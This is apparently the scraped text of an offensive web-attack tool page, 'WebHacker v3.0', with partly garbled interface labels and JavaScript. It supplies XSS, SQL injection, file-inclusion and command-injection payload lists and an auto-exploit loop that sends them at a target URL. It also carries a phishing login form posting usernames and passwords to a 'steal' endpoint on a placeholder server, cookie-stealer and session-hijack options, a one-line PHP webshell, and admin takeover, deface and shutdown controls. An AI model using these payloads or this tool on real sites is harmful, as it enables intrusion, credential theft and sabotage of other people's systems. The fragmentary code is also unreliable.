🖥️
Web
Hacker
v3.0
📄 Source
💉 Inject
👤 User
🔐 Admin
🌐 DNS
⚡ Exploit
📄 Source Code Viewer
Target URL:
Proxy:
AllOrigins
CORSProxy
📥 Fetch Source
📋 Headers
🤖 robots.txt
Ready. Enter URL and click Fetch.
💉 Code Injector
Target:
Method:
Parameter Injection
XSS Payload
SQLi Payload
LFI Payload
Command Injection
Parameter:
Payload:
XSS
SQLi
LFI
CMDi
<script>alert(1)</script>
<img src=x onerror=alert(1)>
../../../etc/passwd
;id
💉 SEND
Configure payload and send.
👤 User Attack Panel
Target:
Attack:
Phishing Page
Cookie Stealer
Session Hijack
Custom Payload:
<form action="https://your-server.com/steal" method="POST"> <input type="text" name="user" placeholder="Username"> <input type="password" name="pass" placeholder="Password"> <input type="submit" value="Login"> </form>
🎣 Generate Phishing
🍪 Cookie Stealer
🚀 DEPLOY
User attack panel ready.
🔐 Admin Panel Takeover
Admin URL:
Action:
Scan Endpoints
Bypass Auth
Full Takeover
Deface
Shutdown
Webshell / Deface Content:
<?php system($_GET['cmd']); ?>
🔍 Scan
🔓 Bypass
⚡ TAKEOVER
🎨 Deface
☠️ SHUTDOWN
Admin panel ready.
🌐 DNS Tools
Domain:
Type:
A Record
MX
NS
TXT
🔍 DNS Lookup
📡 Subdomain Bruteforce
DNS tools ready.
⚡ Exploit Engine
Target:
Type:
SQLi Union
RCE Command
LFI Read
SSRF
Parameter:
Value:
⚡ RUN
🤖 AUTO EXPLOIT
Exploit engine ready.
💻 Console
Clear
[+] WebHacker v3.0 initialized
[>] Ready for pentest operations
','
','
','','
'], sqli:["' OR '1'='1","' OR 1=1--","' UNION SELECT 1,2,3--","admin'--","1' AND SLEEP(5)--"], lfi:['../../../etc/passwd','../../../../windows/win.ini','php://filter/convert.base64-encode/resource=index.php','/proc/self/environ'], cmdi:[';id','|id','`id`','$(id)',';cat /etc/passwd'] }; function loadPayload(type){ document.querySelectorAll('#payloadTabs button').forEach(b=>b.classList.remove('active')); event.target.classList.add('active'); const list=$('payloadList'); list.innerHTML=''; (payloads[type]||[]).forEach(p=>{ const d=document.createElement('div'); d.style.cssText='padding:3px;cursor:pointer;border-bottom:1px solid #222;'; d.textContent=p; d.onclick=function(){$('injPayload').value=p;}; list.appendChild(d); }); } async function sendInjection(){ const url=$('injUrl').value.trim(); const param=$('injParam').value.trim(); const payload=$('injPayload').value.trim(); const out=$('injOutput'); if(!url||!param||!payload){out.textContent='Fill all fields.';return;} const sep=url.includes('?')?'&':'?'; const target=url+sep+param+'='+encodeURIComponent(payload); out.innerHTML='
Sending...'; term('Sending injection: '+payload.substring(0,40)); const r=await req('GET',target); out.textContent='=== Response ('+r.status+') ===\n\n'+r.body.substring(0,5000); } // USER function genPhishPage(){ const out=$('usrOutput'); out.textContent='\n\n
Login
\n\n
\n
\n
\n
\n
\n"}, {name:'XSS Image',payload:"
"}, {name:'LFI passwd',payload:"../../../etc/passwd"}, {name:'LFI win.ini',payload:"../../../../windows/win.ini"}, {name:'RCE id',payload:";id"}, {name:'RCE whoami',payload:"|whoami"}, {name:'SSRF Local',payload:"http://127.0.0.1:80"} ]; let res='=== AUTO EXPLOIT RESULTS ===\n\n'; for(const t of tests){ const sep=url.includes('?')?'&':'?'; const target=url+sep+param+'='+encodeURIComponent(t.payload); res+='Testing: '+t.name+'\n Payload: '+t.payload.substring(0,40)+'\n'; try{ const r=await fetch(target,{mode:'no-cors'}); res+=' Status: '+(r.status||'no-cors')+'\n'; if(r.status===200) res+=' [!] Possible vulnerability!\n'; }catch(e){res+=' Error: '+e.message+'\n';} out.innerHTML='
'+Math.round((tests.indexOf(t)+1)/tests.length*100)+'%'; } out.textContent=res; term('Auto-exploit complete'); } // INIT loadPayload('xss'); term('WebHacker v3.0 loaded successfully'); term('All modules ready');